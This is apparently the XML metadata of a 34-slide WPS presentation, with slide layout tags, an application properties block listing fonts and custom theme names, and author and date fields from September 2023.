  <p:tag name="KSO_WM_SLIDE_SIZE" val="913.55*403"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="0*66.25"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_SLIDE_DIAGTYPE" val="l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1"/>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COMMONDATA" val="eyJoZGlkIjoiMmY5MzdhMTM4MGYwZjY3MmUyNDAwYWI5ODI4MjA4MzUifQ=="/>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0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4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2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2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29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0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3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3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3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3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3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3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15019</Words>
  <Application>WPS Writer</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>525</Paragraphs>
  <Slides>34</Slides>
  <Notes>11</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>43</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>34</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="104" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>阿里巴巴普惠体 R</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
      <vt:lpstr>苹方-简</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>汉仪旗黑</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>思源黑体 CN Bold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>黑体-简</vt:lpstr>
      <vt:lpstr>Lucida Sans</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>思源黑体 CN Heavy</vt:lpstr>
      <vt:lpstr>思源黑体 CN Normal</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>宋体-简</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>135_自定义设计方案</vt:lpstr>
      <vt:lpstr>143_自定义设计方案</vt:lpstr>
      <vt:lpstr>134_自定义设计方案</vt:lpstr>
      <vt:lpstr>1_自定义设计方案</vt:lpstr>
      <vt:lpstr>2_自定义设计方案</vt:lpstr>
      <vt:lpstr>3_自定义设计方案</vt:lpstr>
      <vt:lpstr>4_自定义设计方案</vt:lpstr>
      <vt:lpstr>5_自定义设计方案</vt:lpstr>
      <vt:lpstr>6_自定义设计方案</vt:lpstr>
      <vt:lpstr>7_自定义设计方案</vt:lpstr>
      <vt:lpstr>8_自定义设计方案</vt:lpstr>
      <vt:lpstr>9_自定义设计方案</vt:lpstr>
      <vt:lpstr>10_自定义设计方案</vt:lpstr>
      <vt:lpstr>11_自定义设计方案</vt:lpstr>
      <vt:lpstr>12_自定义设计方案</vt:lpstr>
      <vt:lpstr>13_自定义设计方案</vt:lpstr>
      <vt:lpstr>14_自定义设计方案</vt:lpstr>
      <vt:lpstr>15_自定义设计方案</vt:lpstr>
      <vt:lpstr>16_自定义设计方案</vt:lpstr>
      <vt:lpstr>17_自定义设计方案</vt:lpstr>
      <vt:lpstr>18_自定义设计方案</vt:lpstr>
      <vt:lpstr>19_自定义设计方案</vt:lpstr>
      <vt:lpstr>20_自定义设计方案</vt:lpstr>
      <vt:lpstr>21_自定义设计方案</vt:lpstr>
      <vt:lpstr>22_自定义设计方案</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>23_自定义设计方案</vt:lpstr>
      <vt:lpstr>24_自定义设计方案</vt:lpstr>
      <vt:lpstr>25_自定义设计方案</vt:lpstr>
      <vt:lpstr>26_自定义设计方案</vt:lpstr>
      <vt:lpstr>27_自定义设计方案</vt:lpstr>
      <vt:lpstr>28_自定义设计方案</vt:lpstr>
      <vt:lpstr>29_自定义设计方案</vt:lpstr>
      <vt:lpstr>30_自定义设计方案</vt:lpstr>
      <vt:lpstr>31_自定义设计方案</vt:lpstr>
      <vt:lpstr>32_自定义设计方案</vt:lpstr>
      <vt:lpstr>33_自定义设计方案</vt:lpstr>
      <vt:lpstr>34_自定义设计方案</vt:lpstr>
      <vt:lpstr>35_自定义设计方案</vt:lpstr>
      <vt:lpstr>36_自定义设计方案</vt:lpstr>
      <vt:lpstr>37_自定义设计方案</vt:lpstr>
      <vt:lpstr>38_自定义设计方案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Liping</dc:creator>
  <cp:lastModifiedBy>Fangtian Zhong</cp:lastModifiedBy>
  <cp:revision>101</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-21T17:45:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-21T17:45:28Z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A1378116E481472FA6251A948E06C9AB_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-4.9.0.7859</vt:lpwstr>
  </property>
</Properties>
</file>